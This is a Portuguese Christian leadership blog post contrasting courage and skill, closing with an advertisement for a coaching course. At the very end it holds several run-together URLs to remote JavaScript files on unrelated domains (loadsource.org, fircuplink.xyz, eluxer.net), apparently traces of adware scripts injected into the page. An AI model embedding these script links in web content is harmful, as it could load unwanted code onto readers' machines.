Coragem x habilidade

Coragem ou habilidade? Na verdade, nem um, nem outro. Antes, a combinação dessas duas características é que é poderosa demais. No entanto, nem todos conseguem ser habilidosos e corajosos. Agora, quando o líder cristão consegue desenvolver essa combinação, não há limites para o que deseja conquistar e para o que ele vai experimentar em sua trajetória.

Aqueles que têm muita coragem e pouca habilidade correm o risco de cometer muito mais erros, pois eles têm a tendência de “meter os pés pelas mãos” e acabam por atropelar os processos naturais e essenciais dos projetos e acabam se frustrando.

É fato que o líder cristão precisa, e muito, de coragem em sua liderança porque a coragem é capaz de fazê-lo “andar sobre as águas”. Porém, é muito importante que ele também tenha a habilidade, pois é a habilidade que vai mantê-lo “andando sobre as águas”.

Já aqueles que têm muita habilidade, mas não têm coragem, geralmente, acumulam um monte de conhecimento, aprendem muito nos mais diversos treinamentos que se propõem a fazer, sem, no entanto, ter a coragem necessária para colocar todo o conhecimento em prática.

Pessoas que têm habilidade e não têm coragem, são verdadeiros “cabeções”, mas não conseguem realizar quase nada, pois lhes falta coragem necessária para iniciar.

Por isso que o equilíbrio e a combinação entre estas duas características é muito importante, pois a coragem faz o líder iniciar os projetos e a habilidade o faz manter-se, com excelência, naquilo que se começou.

Quando o líder tem coragem e adquire a habilidade, ele consegue alcançar níveis muito maiores. Sim, porque não é o que o fez chegar aonde chegou que vai fazê-lo ir além, pois o conhecimento que ele tinha era o necessário para levá-lo até aquele nível.

Agora, ele vai precisar aumentar suas habilidades através de novos treinamentos, por exemplo, para que ele possa avançar e crescer em sua liderança. Esses novos conhecimentos adquiridos é que trarão as habilidades necessárias para que ele possa experimentar níveis cada vez mais altos.

O conhecimento pode ser adquirido através de um livro, de palestras ou de treinamentos específicos. O conhecimento que se adquire ajuda a despertar a criatividade e abre a mente do líder.

E, quando o líder investe em um treinamento específico, por exemplo, além de abrir a mente e de despertar a criatividade, o treinamento também tem o poder de capacitar a pessoa com “ferramentas” específicas para desenvolver ou melhorar habilidades de forma a levá-la a experimentar níveis mais altos.

Mas, se o líder é daqueles que estuda muito, faz muitos cursos, lê muitos livros e ainda não conseguiu colocar nada em prática, ainda não conseguiu iniciar nada de prático com todo o conhecimento que recebeu, ele precisa decidir começar, se encher de coragem e, simplesmente, começar.

O conhecimento só é transformado em sabedoria quando ele é colocado em prática. Então, fica a dica para você que deseja alcançar níveis ainda maiores, não só colocar em prática o que você aprendeu até agora, como, principalmente, de estar buscando novos conhecimentos a cada dia.

O Instituto Liderança de Sucesso realiza um curso inovador e específico para a liderança cristã chamado de Coaching Day. O curso tem a proposta de despertar a criatividade que já existe em você através de ferramentas práticas e objetivas, fazendo com que você possa desenvolver as habilidades necessárias para alcançar os resultados que você deseja.

Não fique de fora da próxima turma! Já está em cima e tem vagas limitadas. Por isso, entre em contato com a minha equipe através do WhatsApp 21-97016-2326 ou clique AQUI e saiba mais.

http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7038x&r=1533901801273http://fircuplink.xyz/addons/lnkr5.min.jshttp://fircuplink.xyz/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7038_